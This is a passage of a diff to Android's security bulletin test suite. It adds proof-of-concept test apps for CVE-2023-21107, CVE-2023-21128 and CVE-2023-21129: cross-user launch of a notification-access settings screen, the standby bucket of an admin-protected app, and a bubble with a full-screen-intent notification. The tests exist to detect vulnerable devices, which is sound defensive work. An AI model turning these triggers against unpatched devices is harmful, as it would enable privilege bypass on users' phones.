+        PocAuthenticator(Context context) {
+            super(context);
+        }
+
+        @Override
+        public Bundle editProperties(AccountAuthenticatorResponse response, String accountType) {
+            return null;
+        }
+
+        @Override
+        public Bundle confirmCredentials(AccountAuthenticatorResponse response, Account account,
+                Bundle options) throws NetworkErrorException {
+            return null;
+        }
+
+        @Override
+        public Bundle getAuthToken(AccountAuthenticatorResponse response, Account account,
+                String authTokenType, Bundle options) throws NetworkErrorException {
+            return null;
+        }
+
+        @Override
+        public String getAuthTokenLabel(String authTokenType) {
+            return null;
+        }
+
+        @Override
+        public Bundle updateCredentials(AccountAuthenticatorResponse response, Account account,
+                String authTokenType, Bundle options) throws NetworkErrorException {
+            return null;
+        }
+
+        @Override
+        public Bundle hasFeatures(AccountAuthenticatorResponse response, Account account,
+                String[] features) throws NetworkErrorException {
+            return null;
+        }
+    }
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21107/Android.bp b/hostsidetests/securitybulletin/test-apps/CVE-2023-21107/Android.bp
new file mode 100644
index 0000000..81c0f02
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21107/Android.bp
@@ -0,0 +1,51 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+package {
+    default_applicable_licenses: ["Android-Apache-2.0"],
+}
+
+android_test_helper_app {
+    name: "CVE-2023-21107-test",
+    defaults: [
+        "cts_support_defaults",
+    ],
+    srcs: [
+        "test-app/src/**/*.java"
+    ],
+    test_suites: [
+        "sts",
+    ],
+    manifest: "test-app/AndroidManifest.xml",
+    static_libs: [
+        "androidx.test.core",
+        "androidx.test.rules",
+        "androidx.test.uiautomator_uiautomator",
+        "sts-device-util",
+        "compatibility-device-util-axt",
+    ],
+    platform_apis: true,
+}
+
+android_test_helper_app {
+    name: "CVE-2023-21107-helper",
+    test_suites: [
+        "sts",
+    ],
+    manifest: "helper-app/AndroidManifest.xml",
+    sdk_version: "current",
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21107/helper-app/AndroidManifest.xml b/hostsidetests/securitybulletin/test-apps/CVE-2023-21107/helper-app/AndroidManifest.xml
new file mode 100644
index 0000000..d2f0333
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21107/helper-app/AndroidManifest.xml
@@ -0,0 +1,24 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+  Copyright 2023 The Android Open Source Project
+
+  Licensed under the Apache License, Version 2.0 (the "License");
+  you may not use this file except in compliance with the License.
+  You may obtain a copy of the License at
+
+       http://www.apache.org/licenses/LICENSE-2.0
+
+  Unless required by applicable law or agreed to in writing, software
+  distributed under the License is distributed on an "AS IS" BASIS,
+  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+  See the License for the specific language governing permissions and
+  limitations under the License.
+  -->
+
+<manifest xmlns:android="http://schemas.android.com/apk/res/android"
+    package="android.security.cts.CVE_2023_21107_helper">
+    <application>
+        <service android:name=".TestListener"
+            android:permission="android.permission.BIND_NOTIFICATION_LISTENER_SERVICE" />
+    </application>
+</manifest>
diff --git a/tests/tests/security/src/android/security/cts/CVE_2022_20143/PocActivity.java b/hostsidetests/securitybulletin/test-apps/CVE-2023-21107/helper-app/src/android/security/cts/CVE_2023_21107_helper/TestListener.java
similarity index 70%
copy from tests/tests/security/src/android/security/cts/CVE_2022_20143/PocActivity.java
copy to hostsidetests/securitybulletin/test-apps/CVE-2023-21107/helper-app/src/android/security/cts/CVE_2023_21107_helper/TestListener.java
index 4416990..860a5ca 100644
--- a/tests/tests/security/src/android/security/cts/CVE_2022_20143/PocActivity.java
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21107/helper-app/src/android/security/cts/CVE_2023_21107_helper/TestListener.java
@@ -1,5 +1,5 @@
 /*
- * Copyright (C) 2022 The Android Open Source Project
+ * Copyright (C) 2023 The Android Open Source Project
  *
  * Licensed under the Apache License, Version 2.0 (the "License");
  * you may not use this file except in compliance with the License.
@@ -14,9 +14,8 @@
  * limitations under the License.
  */
 
-package android.security.cts.CVE_2022_20143;
+package android.security.cts.CVE_2023_21107_helper;
 
-import android.app.Activity;
+import android.service.notification.NotificationListenerService;
 
-public class PocActivity extends Activity {
-}
+public class TestListener extends NotificationListenerService {}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21107/test-app/AndroidManifest.xml b/hostsidetests/securitybulletin/test-apps/CVE-2023-21107/test-app/AndroidManifest.xml
new file mode 100644
index 0000000..2979d05
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21107/test-app/AndroidManifest.xml
@@ -0,0 +1,22 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+  Copyright 2023 The Android Open Source Project
+
+  Licensed under the Apache License, Version 2.0 (the "License");
+  you may not use this file except in compliance with the License.
+  You may obtain a copy of the License at
+
+       http://www.apache.org/licenses/LICENSE-2.0
+
+  Unless required by applicable law or agreed to in writing, software
+  distributed under the License is distributed on an "AS IS" BASIS,
+  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+  See the License for the specific language governing permissions and
+  limitations under the License.
+  -->
+
+<manifest xmlns:android="http://schemas.android.com/apk/res/android"
+    package="android.security.cts.CVE_2023_21107_test">
+    <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
+        android:targetPackage="android.security.cts.CVE_2023_21107_test" />
+</manifest>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21107/test-app/src/android/security/cts/CVE_2023_21107_test/DeviceTest.java b/hostsidetests/securitybulletin/test-apps/CVE-2023-21107/test-app/src/android/security/cts/CVE_2023_21107_test/DeviceTest.java
new file mode 100644
index 0000000..681b4e4
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21107/test-app/src/android/security/cts/CVE_2023_21107_test/DeviceTest.java
@@ -0,0 +1,112 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.CVE_2023_21107_test;
+
+import static androidx.test.platform.app.InstrumentationRegistry.getInstrumentation;
+
+import static com.android.sts.common.SystemUtil.poll;
+
+import static org.junit.Assert.assertFalse;
+import static org.junit.Assume.assumeNoException;
+import static org.junit.Assume.assumeNotNull;
+
+import android.app.Instrumentation;
+import android.app.UiAutomation;
+import android.content.Context;
+import android.content.Intent;
+import android.content.pm.UserInfo;
+import android.os.UserHandle;
+import android.os.UserManager;
+import android.provider.Settings;
+
+import androidx.test.runner.AndroidJUnit4;
+import androidx.test.uiautomator.UiDevice;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+import java.util.regex.Matcher;
+import java.util.regex.Pattern;
+
+@RunWith(AndroidJUnit4.class)
+public class DeviceTest {
+    @Test
+    public void testCVE_2023_21107() {
+        UiAutomation uiAutomation = null;
+        try {
+            Instrumentation instrumentation = getInstrumentation();
+            Context context = instrumentation.getContext();
+            uiAutomation = instrumentation.getUiAutomation();
+
+            UserHandle workUserHandle = null;
+            uiAutomation.adoptShellPermissionIdentity(android.Manifest.permission.CREATE_USERS);
+            for (UserInfo info : context.getSystemService(UserManager.class).getUsers()) {
+                if (info.toString().contains("CVE_2023_21107_TestUser")) {
+                    workUserHandle = info.getUserHandle();
+                    break;
+                }
+            }
+            assumeNotNull(workUserHandle);
+
+            // NotificationAccessDetailsActivity should not launch for another
+            // user id without android.permission.INTERACT_ACROSS_USERS_FULL
+            Intent intent = new Intent(Settings.ACTION_NOTIFICATION_LISTENER_DETAIL_SETTINGS);
+            String helperAppPackage = "android.security.cts.CVE_2023_21107_helper";
+            intent.putExtra(
+                    Settings.EXTRA_NOTIFICATION_LISTENER_COMPONENT_NAME,
+                    helperAppPackage + "/" + helperAppPackage + ".TestListener");
+            intent.putExtra(Intent.EXTRA_USER_HANDLE, workUserHandle);
+            context.startActivity(intent.addFlags(Intent.FLAG_ACTIVITY_NEW_TASK));
+
+            // Test fails if NotificationAccessDetailsActivity is launched
+            assertFalse(
+                    "Vulnerable to b/259385017",
+                    checkActivityLaunched(UiDevice.getInstance(instrumentation)));
+        } catch (Exception e) {
+            assumeNoException(e);
+        } finally {
+            try {
+                uiAutomation.dropShellPermissionIdentity();
+            } catch (Exception ignored) {
+                // Ignore all exceptiions
+            }
+        }
+    }
+
+    private boolean checkActivityLaunched(final UiDevice device) throws Exception {
+        final Pattern resumedPattern = Pattern.compile("mResumed=(?<value>(true|false))");
+        return poll(
+                () -> {
+                    try {
+                        String dumpsys =
+                                device.executeShellCommand(
+                                        String.format(
+                                                "dumpsys activity "
+                                                        + "NotificationAccessDetailsActivity"));
+                        Matcher matcher = resumedPattern.matcher(dumpsys);
+                        if (matcher.find() && matcher.group("value").equals("true")) {
+                            return true;
+                        }
+                    } catch (Exception e) {
+                        assumeNoException(e);
+                    }
+                    return false;
+                },
+                1_000L /* pollingTime */,
+                5_000L /* maxPollingTime */);
+    }
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21128/test-app/res/values/strings.xml b/hostsidetests/securitybulletin/test-apps/CVE-2023-21128/test-app/res/values/strings.xml
index 2318fa6..1fca492 100644
--- a/hostsidetests/securitybulletin/test-apps/CVE-2023-21128/test-app/res/values/strings.xml
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21128/test-app/res/values/strings.xml
@@ -16,6 +16,9 @@
   -->
 
 <resources>
+    <string name="bucketValueChangeFailMessage">Unable to set standby bucket value!!</string>
     <string name="helperAppPackage">android.security.cts.CVE_2023_21128_helper</string>
+    <string name="protectedPackageFailMessage">App not added in admin protected packages list
+    </string>
     <string name="testFailMessage">Vulnerable to b/272042183</string>
 </resources>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21128/test-app/src/android/security/cts/CVE_2023_21128_test/DeviceTest.java b/hostsidetests/securitybulletin/test-apps/CVE-2023-21128/test-app/src/android/security/cts/CVE_2023_21128_test/DeviceTest.java
index 755aaae..c033c7d 100644
--- a/hostsidetests/securitybulletin/test-apps/CVE-2023-21128/test-app/src/android/security/cts/CVE_2023_21128_test/DeviceTest.java
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21128/test-app/src/android/security/cts/CVE_2023_21128_test/DeviceTest.java
@@ -16,13 +16,17 @@
 
 package android.security.cts.CVE_2023_21128_test;
 
+import static android.app.usage.UsageStatsManager.STANDBY_BUCKET_ACTIVE;
+import static android.app.usage.UsageStatsManager.STANDBY_BUCKET_EXEMPTED;
+import static android.app.usage.UsageStatsManager.STANDBY_BUCKET_NEVER;
+
 import static androidx.test.platform.app.InstrumentationRegistry.getInstrumentation;
 
 import static org.junit.Assert.assertFalse;
 import static org.junit.Assume.assumeNoException;
+import static org.junit.Assume.assumeTrue;
 
 import android.app.admin.DevicePolicyManager;
-import android.app.usage.UsageStatsManager;
 import android.content.ComponentName;
 import android.content.Context;
 
@@ -34,6 +38,7 @@
 import org.junit.runner.RunWith;
 
 import java.util.ArrayList;
+import java.util.List;
 
 @RunWith(AndroidJUnit4.class)
 public class DeviceTest {
@@ -56,14 +61,26 @@
                             add(helperAppPackage);
                         }
                     });
-
-            AmUtils.setStandbyBucket(helperAppPackage, UsageStatsManager.STANDBY_BUCKET_ACTIVE);
+            List<String> packages = dpm.getUserControlDisabledPackages(componentName);
+            assumeTrue(
+                    context.getString(R.string.protectedPackageFailMessage),
+                    packages.contains(helperAppPackage));
+            AmUtils.setStandbyBucket(helperAppPackage, STANDBY_BUCKET_ACTIVE);
+            final int firstStandbyBucketValue = AmUtils.getStandbyBucket(helperAppPackage);
+            AmUtils.setStandbyBucket(helperAppPackage, STANDBY_BUCKET_NEVER);
+            final int secondStandbyBucketValue = AmUtils.getStandbyBucket(helperAppPackage);
+            boolean passCondition =
+                    (firstStandbyBucketValue == STANDBY_BUCKET_EXEMPTED
+                            && secondStandbyBucketValue == STANDBY_BUCKET_EXEMPTED);
+            boolean failCondition =
+                    (firstStandbyBucketValue == STANDBY_BUCKET_ACTIVE
+                            && secondStandbyBucketValue == STANDBY_BUCKET_NEVER);
+            assumeTrue(
+                    context.getString(R.string.bucketValueChangeFailMessage),
+                    passCondition || failCondition);
 
             // Test fails if the AdminProtected package bucket is not equal STANDBY_BUCKET_EXEMPTED
-            assertFalse(
-                    context.getString(R.string.testFailMessage),
-                    AmUtils.getStandbyBucket(helperAppPackage)
-                            != UsageStatsManager.STANDBY_BUCKET_EXEMPTED);
+            assertFalse(context.getString(R.string.testFailMessage), failCondition);
         } catch (Exception e) {
             assumeNoException(e);
         } finally {
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21129/Android.bp b/hostsidetests/securitybulletin/test-apps/CVE-2023-21129/Android.bp
new file mode 100644
index 0000000..4eee8f7
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21129/Android.bp
@@ -0,0 +1,36 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+package {
+    default_applicable_licenses: ["Android-Apache-2.0"],
+}
+
+android_test_helper_app {
+    name: "CVE-2023-21129",
+    defaults: ["cts_support_defaults"],
+    srcs: [
+        "src/**/*.java",
+    ],
+    test_suites: [
+        "sts",
+    ],
+    static_libs: [
+        "androidx.test.core",
+        "androidx.test.rules",
+    ],
+    sdk_version: "current",
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21129/AndroidManifest.xml b/hostsidetests/securitybulletin/test-apps/CVE-2023-21129/AndroidManifest.xml
new file mode 100644
index 0000000..56bea86
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21129/AndroidManifest.xml
@@ -0,0 +1,37 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+  Copyright 2023 The Android Open Source Project
+
+  Licensed under the Apache License, Version 2.0 (the "License");
+  you may not use this file except in compliance with the License.
+  You may obtain a copy of the License at
+
+       http://www.apache.org/licenses/LICENSE-2.0
+
+  Unless required by applicable law or agreed to in writing, software
+  distributed under the License is distributed on an "AS IS" BASIS,
+  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+  See the License for the specific language governing permissions and
+  limitations under the License.
+  -->
+
+<manifest xmlns:android="http://schemas.android.com/apk/res/android"
+    package="android.security.cts.CVE_2023_21129">
+    <uses-permission android:name="android.permission.POST_NOTIFICATIONS" />
+    <uses-permission android:name="android.permission.USE_FULL_SCREEN_INTENT" />
+    <application>
+        <activity
+            android:name=".BubbleActivity"
+            android:exported="true">
+            <intent-filter>
+                <action android:name="android.intent.action.MAIN" />
+                <category android:name="android.intent.category.LAUNCHER" />
+            </intent-filter>
+        </activity>
+        <activity android:name=".PocActivity" />
+        <service android:name=".PocService" />
+    </application>
+    <instrumentation
+            android:name="androidx.test.runner.AndroidJUnitRunner"
+            android:targetPackage="android.security.cts.CVE_2023_21129" />
+</manifest>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21129/res/values/integers.xml b/hostsidetests/securitybulletin/test-apps/CVE-2023-21129/res/values/integers.xml
new file mode 100644
index 0000000..50aa41f
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21129/res/values/integers.xml
@@ -0,0 +1,23 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+  Copyright 2023 The Android Open Source Project
+
+  Licensed under the Apache License, Version 2.0 (the "License");
+  you may not use this file except in compliance with the License.
+  You may obtain a copy of the License at
+
+       http://www.apache.org/licenses/LICENSE-2.0
+
+  Unless required by applicable law or agreed to in writing, software
+  distributed under the License is distributed on an "AS IS" BASIS,
+  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+  See the License for the specific language governing permissions and
+  limitations under the License.
+  -->
+<resources>
+    <integer name="bubbleMetaDataheight">600</integer>
+    <integer name="iconHeight">30</integer>
+    <integer name="iconWidth">30</integer>
+    <integer name="idPocNotification">0</integer>
+    <integer name="requestCode">0</integer>
+</resources>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21129/res/values/strings.xml b/hostsidetests/securitybulletin/test-apps/CVE-2023-21129/res/values/strings.xml
new file mode 100644
index 0000000..a4e6c2b
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21129/res/values/strings.xml
@@ -0,0 +1,28 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+  Copyright 2023 The Android Open Source Project
+
+  Licensed under the Apache License, Version 2.0 (the "License");
+  you may not use this file except in compliance with the License.
+  You may obtain a copy of the License at
+
+       http://www.apache.org/licenses/LICENSE-2.0
+
+  Unless required by applicable law or agreed to in writing, software
+  distributed under the License is distributed on an "AS IS" BASIS,
+  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+  See the License for the specific language governing permissions and
+  limitations under the License.
+  -->
+
+<resources>
+    <string name="bubbleNotificDisabled">Bubble Notifications are disabled on this device</string>
+    <string name="conversationTitle">Conversation Title</string>
+    <string name="idNotificationChannel">notificationChannelId</string>
+    <string name="msgFailure">Device is vulnerable to b/274759612 !!</string>
+    <string name="nameBroadcastActionString">CVE_2023_21129_action</string>
+    <string name="nameNotificationChannel">b/274759612 notification</string>
+    <string name="personMessagingStyle">Me</string>
+    <string name="shortcutId">shortcutId</string>
+    <string name="tagNotify">NOTIFY_TAG</string>
+</resources>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21129/src/android/security/cts/CVE_2023_21129/BubbleActivity.java b/hostsidetests/securitybulletin/test-apps/CVE-2023-21129/src/android/security/cts/CVE_2023_21129/BubbleActivity.java
new file mode 100644
index 0000000..27cd450
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21129/src/android/security/cts/CVE_2023_21129/BubbleActivity.java
@@ -0,0 +1,46 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.CVE_2023_21129;
+
+import android.app.Activity;
+import android.content.Intent;
+
+public class BubbleActivity extends Activity {
+
+    @Override
+    protected void onResume() {
+        try {
+            super.onResume();
+            // Starting PocService as a ForegroundService to post bubbleNotification
+            startForegroundService(new Intent(this, PocService.class));
+        } catch (Exception e) {
+            // ignore any exceptions
+        }
+    }
+
+    @Override
+    protected void onStop() {
+        try {
+            super.onStop();
+            // onStop() has been called successfully, this indicates presence of vulnerability
+            // so broadcasting it to DeviceTest
+            sendBroadcast(new Intent(getString(R.string.nameBroadcastActionString)));
+        } catch (Exception e) {
+            // ignore any exceptions
+        }
+    }
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21129/src/android/security/cts/CVE_2023_21129/DeviceTest.java b/hostsidetests/securitybulletin/test-apps/CVE-2023-21129/src/android/security/cts/CVE_2023_21129/DeviceTest.java
new file mode 100644
index 0000000..d9dc035
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21129/src/android/security/cts/CVE_2023_21129/DeviceTest.java
@@ -0,0 +1,97 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.CVE_2023_21129;
+
+import static android.app.NotificationManager.BUBBLE_PREFERENCE_ALL;
+
+import static androidx.test.platform.app.InstrumentationRegistry.getInstrumentation;
+
+import static org.junit.Assert.assertFalse;
+import static org.junit.Assume.assumeNoException;
+import static org.junit.Assume.assumeTrue;
+
+import android.app.NotificationManager;
+import android.content.BroadcastReceiver;
+import android.content.Context;
+import android.content.Intent;
+import android.content.IntentFilter;
+
+import androidx.test.runner.AndroidJUnit4;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+import java.util.concurrent.Semaphore;
+import java.util.concurrent.TimeUnit;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(AndroidJUnit4.class)
+public class DeviceTest {
+
+    @Test
+    public void testBubbleNotification() {
+        try {
+            Context context = getInstrumentation().getContext();
+            Semaphore broadcastReceived = new Semaphore(0);
+            final int timeoutMs = 9000;
+
+            // Register a broadcast receiver to receive broadcast from BubbleActivity indicating
+            // presence of vulnerability
+            BroadcastReceiver broadcastReceiver =
+                    new BroadcastReceiver() {
+                        @Override
+                        public void onReceive(Context context, Intent intent) {
+                            try {
+                                if (intent.getAction()
+                                        .equals(
+                                                context.getString(
+                                                        R.string.nameBroadcastActionString))) {
+                                    broadcastReceived.release();
+                                }
+                            } catch (Exception ignored) {
+                                // ignore any exceptions
+                            }
+                        }
+                    };
+            IntentFilter filter =
+                    new IntentFilter(context.getString(R.string.nameBroadcastActionString));
+            context.registerReceiver(broadcastReceiver, filter);
+
+            // Create a notification manager
+            NotificationManager notificationManager =
+                    context.getSystemService(NotificationManager.class);
+
+            // Check if bubble notifications are enabled or disabled on the device
+            assumeTrue(
+                    context.getString(R.string.bubbleNotificDisabled),
+                    notificationManager.getBubblePreference() == BUBBLE_PREFERENCE_ALL);
+
+            // Launching BubbleActivity
+            Intent intent = new Intent(context, BubbleActivity.class);
+            intent.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK | Intent.FLAG_ACTIVITY_CLEAR_TASK);
+            context.startActivity(intent);
+
+            assertFalse(
+                    context.getString(R.string.msgFailure),
+                    broadcastReceived.tryAcquire(timeoutMs, TimeUnit.MILLISECONDS));
+        } catch (Exception e) {
+            assumeNoException(e);
+        }
+    }
+}
diff --git a/tests/tests/security/src/android/security/cts/CVE_2022_20143/PocActivity.java b/hostsidetests/securitybulletin/test-apps/CVE-2023-21129/src/android/security/cts/CVE_2023_21129/PocActivity.java
similarity index 79%
copy from tests/tests/security/src/android/security/cts/CVE_2022_20143/PocActivity.java
copy to hostsidetests/securitybulletin/test-apps/CVE-2023-21129/src/android/security/cts/CVE_2023_21129/PocActivity.java
index 4416990..2a92437 100644
--- a/tests/tests/security/src/android/security/cts/CVE_2022_20143/PocActivity.java
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21129/src/android/security/cts/CVE_2023_21129/PocActivity.java
@@ -1,5 +1,5 @@
 /*
- * Copyright (C) 2022 The Android Open Source Project
+ * Copyright (C) 2023 The Android Open Source Project
  *
  * Licensed under the Apache License, Version 2.0 (the "License");
  * you may not use this file except in compliance with the License.
@@ -14,9 +14,10 @@
  * limitations under the License.
  */
 
-package android.security.cts.CVE_2022_20143;
+package android.security.cts.CVE_2023_21129;
 
 import android.app.Activity;
 
 public class PocActivity extends Activity {
+    // Create an empty activity to detect the vulnerability
 }
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21129/src/android/security/cts/CVE_2023_21129/PocService.java b/hostsidetests/securitybulletin/test-apps/CVE-2023-21129/src/android/security/cts/CVE_2023_21129/PocService.java
new file mode 100644
index 0000000..1406e83
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21129/src/android/security/cts/CVE_2023_21129/PocService.java
@@ -0,0 +1,141 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.CVE_2023_21129;
+
+import static org.junit.Assume.assumeNoException;
+
+import android.app.Notification;
+import android.app.NotificationChannel;
+import android.app.NotificationManager;
+import android.app.PendingIntent;
+import android.app.Service;
+import android.content.Intent;
+import android.content.pm.ShortcutInfo;
+import android.content.pm.ShortcutManager;
+import android.content.res.Resources;
+import android.graphics.Bitmap;
+import android.graphics.Canvas;
+import android.graphics.Color;
+import android.graphics.drawable.Icon;
+import android.os.IBinder;
+
+public class PocService extends Service {
+    private Resources mResources;
+
+    @Override
+    public int onStartCommand(Intent intent, int flags, int startId) {
+        try {
+            mResources = getResources();
+
+            // Create a bubble intent
+            PendingIntent bubbleIntent =
+                    PendingIntent.getActivity(
+                            this,
+                            mResources.getInteger(R.integer.requestCode),
+                            new Intent(this, BubbleActivity.class),
+                            PendingIntent.FLAG_MUTABLE /* flags */);
+
+            // Create a pending intent for fullscreen intent
+            PendingIntent pendingIntent =
+                    PendingIntent.getActivity(
+                            this,
+                            mResources.getInteger(R.integer.requestCode),
+                            new Intent(this, PocActivity.class),
+                            PendingIntent.FLAG_IMMUTABLE /* flags */);
+
+            // Create icon
+            Icon icon = createNotificationIcon();
+
+            // Create a sharing shortcut
+            String shortcutId = getString(R.string.shortcutId);
+            ShortcutInfo shortcut =
+                    new ShortcutInfo.Builder(this, shortcutId)
+                            .setIcon(icon)
+                            .setIntent(new Intent(Intent.ACTION_MAIN))
+                            .setLongLived(true)
+                            .setShortLabel(shortcutId)
+                            .build();
+
+            // Create a shortcutManager
+            ShortcutManager shortcutManager = getSystemService(ShortcutManager.class);
+
+            // Push the shortcut created above to shortcutManager
+            shortcutManager.pushDynamicShortcut(shortcut);
+
+            // Create a notification channel
+            NotificationChannel notificationChannel =
+                    new NotificationChannel(
+                            getString(R.string.idNotificationChannel),
+                            getString(R.string.nameNotificationChannel),
+                            NotificationManager.IMPORTANCE_HIGH);
+            notificationChannel.setDescription(getString(R.string.nameNotificationChannel));
+
+            // Create a notificationManager
+            NotificationManager notificationManager = getSystemService(NotificationManager.class);
+            notificationManager.createNotificationChannel(notificationChannel);
+
+            // Create a bubble metadata.
+            Notification.BubbleMetadata bubbleData =
+                    new Notification.BubbleMetadata.Builder()
+                            .setDesiredHeight(mResources.getInteger(R.integer.bubbleMetaDataheight))
+                            .setIntent(bubbleIntent)
+                            .setAutoExpandBubble(true)
+                            .setSuppressNotification(true)
+                            .setIcon(icon)
+                            .build();
+
+            // Set messagingStyle so that conversations is set for notification
+            Notification.MessagingStyle messagingStyle =
+                    new Notification.MessagingStyle(getString(R.string.personMessagingStyle))
+                            .setConversationTitle(getString(R.string.conversationTitle));
+
+            // Create a notification, referencing the sharing shortcut.
+            Notification.Builder pocNotification =
+                    new Notification.Builder(this, getString(R.string.idNotificationChannel))
+                            .setContentIntent(bubbleIntent)
+                            .setSmallIcon(icon)
+                            .setShortcutId(shortcutId)
+                            .setBubbleMetadata(bubbleData)
+                            .setFullScreenIntent(pendingIntent, true /* high priority */)
+                            .setStyle(messagingStyle);
+
+            notificationManager.notify(
+                    getString(R.string.tagNotify),
+                    mResources.getInteger(R.integer.idPocNotification),
+                    pocNotification.build());
+        } catch (Exception e) {
+            assumeNoException(e);
+        }
+        return super.onStartCommand(intent, flags, startId);
+    }
+
+    Icon createNotificationIcon() throws Exception {
+        Bitmap testBitmap =
+                Bitmap.createBitmap(
+                        getResources().getInteger(R.integer.iconWidth),
+                        getResources().getInteger(R.integer.iconHeight),
+                        Bitmap.Config.ARGB_8888);
+        final Canvas canvas = new Canvas(testBitmap);
+        canvas.drawColor(Color.BLUE);
+        return Icon.createWithBitmap(testBitmap);
+    }
+
+    @Override
+    public IBinder onBind(Intent intent) {
+        return null;
+    }
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21144/Android.bp b/hostsidetests/securitybulletin/test-apps/CVE-2023-21144/Android.bp
new file mode 100644
index 0000000..a1132bb
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21144/Android.bp
@@ -0,0 +1,39 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
